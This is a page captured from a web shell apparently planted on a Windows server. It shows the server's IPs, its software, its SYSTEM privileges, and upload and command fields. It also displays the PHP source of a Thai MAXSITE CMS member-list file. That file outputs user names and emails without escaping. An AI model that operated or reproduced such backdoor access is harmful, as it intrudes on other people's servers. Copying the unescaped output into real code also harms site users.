403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myoffice/2563/modules_241262/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/myoffice/2563/modules_241262/user/uservisit.php
<?
/*
ระบบสมาชิก เวอร์ชั่น @V.3
สำหรับไทย CMS MAXSITE 1.10
จัดทำโดย นายวัชระ บุตรโท
เว็บมาสเตอร์ www.kokostudio.net
*/
?>

<div align="left">
      <table cellspacing="0" cellpadding="0" width="760" border="0">
        <tbody>
          <tr>
            <td width="20"><img id="b1_r1_c1" height="15" alt="" 
                  src="images/main/b1_r1_c1.gif" width="20" border="0" /></td>
            <td background="images/main/b1_top_bg.gif"><img id="b1_r1_c3" 
                  height="15" alt="" src="images/main/b1_top_bg.gif" width="10" 
                  border="0" /></td>
            <td width="19"><img id="b1_r1_c4" height="15" alt="" 
                  src="images/main/b1_r1_c4.gif" width="19" 
              border="0" /></td>
          </tr>
        </tbody>
      </table>
	  <table cellspacing="0" cellpadding="0" width="700" border="0">
        <tbody>
          <tr>
            <td width="10" background="images/main/b1_r2_c1.gif" 
                  height="100%"><img id="b1_r2_c1" height="10" alt="" 
                  src="images/main/b1_r2_c1.gif" width="10" border="0" /></td>
            <td valign="top" width="100%" background="images/main/b1_ct_bg.gif" 
                height="100%"><div align="center">
                <table cellspacing="0" cellpadding="0" width="98%" border="0">
                  <tbody>
                    <tr>
                      <td><table width="100%">
                          <tr>
                            <td><img src="images/menu/userkm.gif" border="0" /><br />
                              <table width="100%" align="center" cellspacing="0" cellpadding="0" border="0">
                                <tr>
                                  <td height="1" class="dotline"></td>
                                </tr>
                                <tr>
                                  <td>
                                      <!-- แสดงผลรายการสมาชิกเว็บ -->
                                      <?
//////////////////////////////////////////// แสดงรายชื่อสมาชิกเว็บ
if($_GET[op] == ""){
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 20 ;
$SUMPAGE = $db->num_rows(TB_user,"id","");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
?>
                                      <form action="?name=user&amp;file=user_cp&amp;op=user_del&amp;action=multidel" method="post" name="myform" id="myform">
                                        <table width="100%" cellspacing="2" cellpadding="1" >
                                          <tr bgcolor="#990000" height="25">
                                            <td><div align="center"><font color="#FFFFFF"><b>ภาพ</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>ชื่อ - นามสกุล</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>อีเมล์</b></font></div></td>
											 <td><div align="center"><font color="#FFFFFF"><b>สถิติการเข้าใช้งาน</b></font></div></td>
                                          </tr>
                                          <?
$res[user] = $db->select_query("SELECT * FROM ".TB_user." ORDER BY id DESC LIMIT $goto, $limit ");
while($arr[user] = $db->fetch($res[user])){
	$res[groups] = $db->select_query("SELECT * FROM ".TB_ADMIN_GROUP." WHERE id='".$arr[user][level]."' ");
	$arr[groups] = $db->fetch($res[groups]);
?>
                                          <tr>
                                            <td width="110" align="center">
											<? if ($arr[user][update_date]<>""){?>
											<img src="usericon/<?=$arr[user][post_date];?>.jpg" name="view01" border="0" id="view01" <?echo " WIDTH=\""._Iuser_W."\" HEIGHT=\""._Iuser_H."\" ";?> />
			<? } else {
			?>
										<img src="usericon/user.jpg" name="view01" border="0" id="view01" <?echo " WIDTH=\""._Iuser_W."\" HEIGHT=\""._Iuser_H."\" ";?> />
			<? } ?></td>
                                            <td width="150" >  <? echo $arr[user][name];?></td>
                                            <td ><? echo $arr[user][email];?></td>
											<td width="50" align="center"><?=$arr[user][pageview];?></td>
                                          </tr>
                                          <tr>
                                            <td colspan="6" height="1" class="dotline"></td>
                                          </tr>
                                          <?
 } 
?>
                                        </table>
                                      </form>
                                    <?
	SplitPage($page,$totalpage,"?name=user&file=userkm");
	echo $ShowSumPages ;
	echo "<BR>";
	echo $ShowPages ;
	echo "<BR><BR>";

//$res[groupstext] = $db->select_query("SELECT * FROM ".TB_ADMIN_GROUP." ORDER BY id ");
//while ($arr[groupstext] = $db->fetch($res[groupstext]))
 //  {
		//echo "<LI><B>".$arr[groupstext][name]." : </B>".$arr[groupstext][description]."</LI>";
 //  }
//$db->closedb ();

}
?>
                                    <br />
                                  </td>
                                </tr>
                              </table>
</td>
                                </tr>
                              </table>
                            <br /></td>
                          </tr>
                      </table></td>
                    </tr>
                  </tbody>
                </table>

Youez - 2016 - github.com/yon3zu
LinuXploit